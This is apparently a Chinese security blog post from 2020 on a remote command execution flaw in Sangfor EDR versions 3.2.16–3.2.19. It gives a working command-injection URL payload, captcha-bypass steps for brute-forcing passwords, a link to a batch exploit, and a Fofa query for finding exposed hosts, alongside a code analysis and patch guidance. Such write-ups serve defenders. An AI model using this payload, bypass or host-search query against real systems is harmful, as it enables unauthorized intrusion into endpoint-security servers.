深信服EDR遠程命令執行

2020-09-05 東塔安全學院

0x00簡介

深信服EDR屬於終端安全產品部,是深信服公司在安全業務的戰略級投入產品。終端安全部門負責下一代終端安全解決方案的產品研發,基於先進的AI技術和高效的安全領域經驗, 建設深信服整體安全解決方案的端點響應能力,與雲、網、端產品聯動,構建面向未來、有效防禦的閉環體系。

0x01利用方法

1.https://xxx.xxx.xx.xx/tool/log/c.php?strip_slashes=system&host=id


2.linux讀取文件


3.驗證碼繞過

// 校驗驗證碼

if (!ldb_run_at_console()) {

if (isset($_REQUEST["captcha"])

|| $_REQUEST["captcha"] != base64_decode("M...

echo "<font color=&39;><b>驗證碼不對,請輸入..."

return;

}

}

先輸入幾次錯誤密碼,把驗證碼弄出來後,開啟Burp(抓包工具)爆破密碼即可,只要驗證碼第一次輸入對後不為空,即可繞過。

4. 批量利用方法

在GitHub上已經有大佬放出批量攻擊的exp

https://github.com/A2gel/sangfor-edr-exploit

請勿嘗試,非法攻擊是法的,請誤去觸犯法律,如作他用所承受的法律責任一概與作者無關


0x02搜索相關漏洞方法

Fofa地址:https://fofa.so/

使用fofa搜尋引擎搜索:body="終端檢測響應平臺"

0x03漏洞分析

1.RCE漏洞

echo "<p><b>Log Helper</b></p>";

$show_form($_REQUEST);

跟入show_form

/**

* 顯示錶單

* @param array $params 請求參數

* @return

*/

$show_form = function($params) use(&$strip_slashes, &$show_input) {

extract($params);

$host = isset($host) ? $strip_slashes($host) : "127.0.0.1";

經典的php變量覆蓋漏洞,使用grep搜索一下

tools目錄下全部都是變量覆蓋漏洞,單純只防禦網上那個poc是沒有用的。

2.任意文件下載漏洞

可以看到代碼沒有任何的過慮

3.驗證碼繞過

0x03影響範圍

受此漏洞影響的版本僅包括EDR

v3.2.16

v3.2.17

v3.2.19

0x04修複方式

目前,深信服已經發布升級版本和補丁,更新至v3.2.21版本或升級補丁即可修復該問題並增強其他安全機制。

1.深信服已通過在線升級方式推送補丁包修復該漏洞,開啟在線升級功能可自動修復該漏洞。

2.針對無法在線升級的用戶,深信服技術服務人員將主動協助用戶完成EDR版本升級或補丁修復工作。同時,用戶可通過以下連結下載升級安裝包來完成EDR的升級工作:

https://bbs.sangfor.com.cn/plugin.php?id=service:download&action=view&fid=100000022878128#/100000035115623/all/undefined

下載升級安裝包後打開EDR管理平臺,在系統管理--升級管理--平臺和終端升級界面中導入該升級安裝包,導入後管理平臺和終端將自動升級至v3.2.21版本。


參考文章:

https://www.cnblogs.com/potatsoSec/p/13520546.html

https://mp.weixin.qq.com/s/nAEqjeCm34t1yD5Kh7ZJxA


免責申明:

本項目僅進行信息搜集,漏洞探測工作,無漏洞利用、攻擊性行為,發文初衷為僅為方便安全人員對授權項目完成測試工作和學習交流使用。 請使用者遵守當地相關法律,勿用於非授權測試,勿用於非授權測試,勿用於非授權測試~~(重要的事情說三遍)~~,如作他用所承受的法律責任一概與東塔安全學院無關!!!

相關焦點

  • 關於深信服終端檢測平臺(EDR)存在遠程命令執行漏洞的安全公告
    一、事件背景 2020年8月18日,國家信息安全漏洞共享平臺(CNVD)收錄了深信服終端檢測平臺(EDR)遠程命令執行漏洞(CNVD-2020-46552)。攻擊者利用該漏洞可遠程執行系統命令,獲得目標伺服器的權限。
  • 【網絡安全】關於深信服終端檢測平臺(EDR)存在遠程 命令執行高危漏洞的預警通報
    網絡安全預警通報近日,國家信息安全漏洞共享平臺(CNVD)公布了深信服終端檢測平臺(EDR)遠程命令執行高危漏洞,攻擊者利用該漏洞可遠程執行系統命令,獲得目標伺服器的權限。01漏洞情況終端檢測響應平臺(EDR)是由深信服科技股份有限公司開發的終端安全解決方案。EDR管理平臺支持統一化的終端資產管理、終端病毒查殺、終端合規性檢查和訪問控制策略管理,支持對安全事件的一鍵隔離處置,以及對熱點事件IOC的全網威脅定位。絕大多數的EDR管理平臺部署於內網環境中,少數系統可以通過外網地址訪問。
  • 深信服EDR「對症下藥」
    具體攻擊流程是,黑客使用工具暴力破解密碼,通過漏洞、遠程桌面連結等途徑侵入企業、單位電腦網路,然後直接植入勒索病毒鎖死資料文件,進而勒索贖金。  WannaCry、Cerber等勒索病毒湧現出大量的變種,用以繞過固有的防禦體系;而勒索軟體服務化、「黑客入侵+勒索」等新式攻擊方法也讓企業安全防禦體系猶如虛設;甚至企業被勒索病毒攻擊的間隔時間也將大大縮減。
  • incaseformat蠕蟲病毒爆發,深信服免費提供查殺工具
    近日,深信服安全團隊監測到一種名為incaseformat的病毒,全國各個區域都出現了被incaseformat病毒刪除文件的用戶。經調查,該蠕蟲正常情況下表現為文件夾蠕蟲,執行後會自複製到系統盤Windows目錄下,並創建註冊表自啟動,一旦用戶重啟主機,使得病毒母體從Windows目錄執行,病毒進程將會遍歷除系統盤外的所有磁碟文件進行刪除,對用戶造成不可挽回的損失。
  • 深信服跨平臺遠程應用發布解決方案
    摘要:深信服EasyConnect(遠程應用發布)解決方案,通過在企業部署終端應用伺服器和Easyconnect設備,將應用程式實時運行的圖像,通過安全傳輸隧道,虛擬的展現在IOS、Android、WindowS各類終端上。
  • Python - 遠程SSH執行命令
    安裝pip install paramiko 使用SSHClient類SSHClient類是SSH服務會話的高級表示,封裝了傳輸、通道以及SFTPClient的校驗、建立方法,通常用於執行命令。ssh代理look_for_keys:是否允許搜索私鑰文件compress:打開時是否壓縮2、load_system_host_keys方法load_host_keys(filename)參數說明:filename:指定遠程主機的公鑰文件
  • 運維開發之paramiko遠程執行命令實時返回
    昨天寫了個 有個運維的小夥伴看完之後和我討論一個問題他現在是使用paramiko庫遠程登錄到伺服器執行命令但是要等命令執行完畢後才返回輸出的結果,沒辦法實現在WEB端實時顯示執行過程,有時候命令執行過程中卡著了,根本不知道是什麼情況。
  • Webmin遠程代碼執行漏洞曝光,允許黑客以root權限執行任意命令
    據外媒報導,在最近的DEFCON安全會議上,研究人員披露了在Webmin中發現的後門機制,包含隱藏一年多的遠程代碼執行漏洞,允許黑客遠程執行任意命令,Webmin 1.882到1.921版本受影響。圖片來源於pixabayWebmin是一個用於管理Linux和UNIX系統的基於Web的開源界面,該後門機制允許黑客在運行Webmin的計算機上以root權限遠程執行惡意命令,利用受攻擊計算機對Webmin管理系統發動攻擊
  • Intellian Satellian Aptus Web遠程命令執行漏洞 CVE-2020-7980
    轉載:騰訊御見威脅情報中心【背景】近日,Intellian Satellian Aptus Web控制臺被曝光存在遠程代碼執行漏洞。Intellian Aptus Web 1.24之前的版本,允許遠程攻擊者通過JSON數據中的Q欄位向/cgi-bin/libagent.cgi 執行任意OS命令。部分情況下需要有效的認證cookie才能登錄並觸發漏洞【漏洞詳情】Intellian Satellian Aptus Web控制臺被曝光存在遠程代碼執行漏洞。
  • 建築行業出現集中式感染CrySiS勒索病毒,深信服率先提供解決方案
    深信服提醒廣大用戶儘快做好病毒檢測與防禦措施,防範該病毒家族的勒索攻擊。wT1中文科技資訊  1、病毒檢測查殺wT1中文科技資訊  (1)深信服EDR產品、下一代防火牆及安全感知平臺等安全產品均具備病毒檢測能力,部署相關產品用戶可進行病毒檢測,如圖所示:wT1中文科技資訊
  • XXL-JOB 針對未授權訪問導致遠程命令執行漏洞的聲明
    對於日前 XXL-JOB 被各大雲廠商報出存在遠程命令執行漏洞的情況,XXL-JOB 作者表示此問題本質上不是「漏洞」,因為官網版本已提供鑑權組件,開啟即可防護。動態生效:用戶在線通過 Web IDE 開發的任務代碼,遠程推送至執行器,實時加載執行。
  • Gox語言中通過SSH遠程執行命令及上傳下載文件-GX10
    Gox語言作為一個「粘合劑」語言,當然需要有便捷的網絡編程能力和遠程伺服器操作的能力,沒有讓人失望的是,這確實也正是它所擅長的。再次說明,Gox語言的安裝很簡單,只需要去官網下載單個的可執行文件或壓縮包,加壓到任意文件夾即可。
  • 深信服EDR終端檢測平臺-RCE漏洞復現
    簡介:EDR簡介(來自官方):終端檢測響應平臺(EDR)是深信服公司提供的一套終端安全解決方案深信服的 EDR產品也支持與AC、SIP、AF、SOC、X-central產品的聯動協同響應,形成新一代的安全防護體系。
  • Win7停服風險徒增,深信服EDR全力守護Win7系統安全
    1、安全策略不再更新,Win7系統等同「裸奔「,易被攻擊滲透記者從深信服終端安全實驗室了解到,Win7平臺的惡意軟體攻擊是Win10平臺的3.4倍。原因在於Win7系統安全策略停止更新後,黑客團夥們紛紛選擇了更容易攻擊成功的Win7系統為攻擊目標。
  • ...桌面服務重磅漏洞CVE-2019-0708可被利用,深信服支招企業如何應對
    Windows遠程桌面服務重磅漏洞CVE-2019-0708可被利用,深信服支招企業如何應對 2019年09月09日 14:55作者:黃頁編輯:黃頁
  • 郵件傳輸代理Exim遠程命令執行漏洞細節披露,影響全球近一半郵件伺服器
    注意:是遠程命令執行,不是遠程代碼執行Exim是一個MTA(Mail Transfer Agent
  • 深信服EDR來支招
    深信服終端檢測響應平臺EDR推出基於內存進行修復的下一代輕補丁漏洞免疫。該方案通過補丁規則包匹配定位問題代碼內存片段,直接替換修復的代碼完成修復,無需重新啟動進程調用內存。、防禦效果,還是性能消耗方面都更具技術優勢:▲漏洞修複方案對比即使在0 day漏洞未及時發布補丁的場景下,深信服
  • 沒有公網IP,花生殼+SSH實現Windows連接遠程Linux執行命令
    在我們學習、工作中,常遇到需要使用Windows系統的電腦,來訪問遠程Linux系統進行相關部署操作,但遠程Linux系統服務與本地Windows不在同一個區域網,而且Linux系統所在的外網IP是動態變化的,那麼,有沒有簡單、高效的辦法解決這個遠程訪問難題?
  • 黑客大神的Weblogic 遠程命令執行漏洞分析
    之前的 CVE-2020-2883 本質上是通過 ReflectionExtractor 調用任意方法,從而實現調用 Runtime 對象的 exec 方法執行任意命令,補丁將 ReflectionExtractor 列入黑名單,那麼可以使用 UniversalExtractor 重新構造一條利用鏈。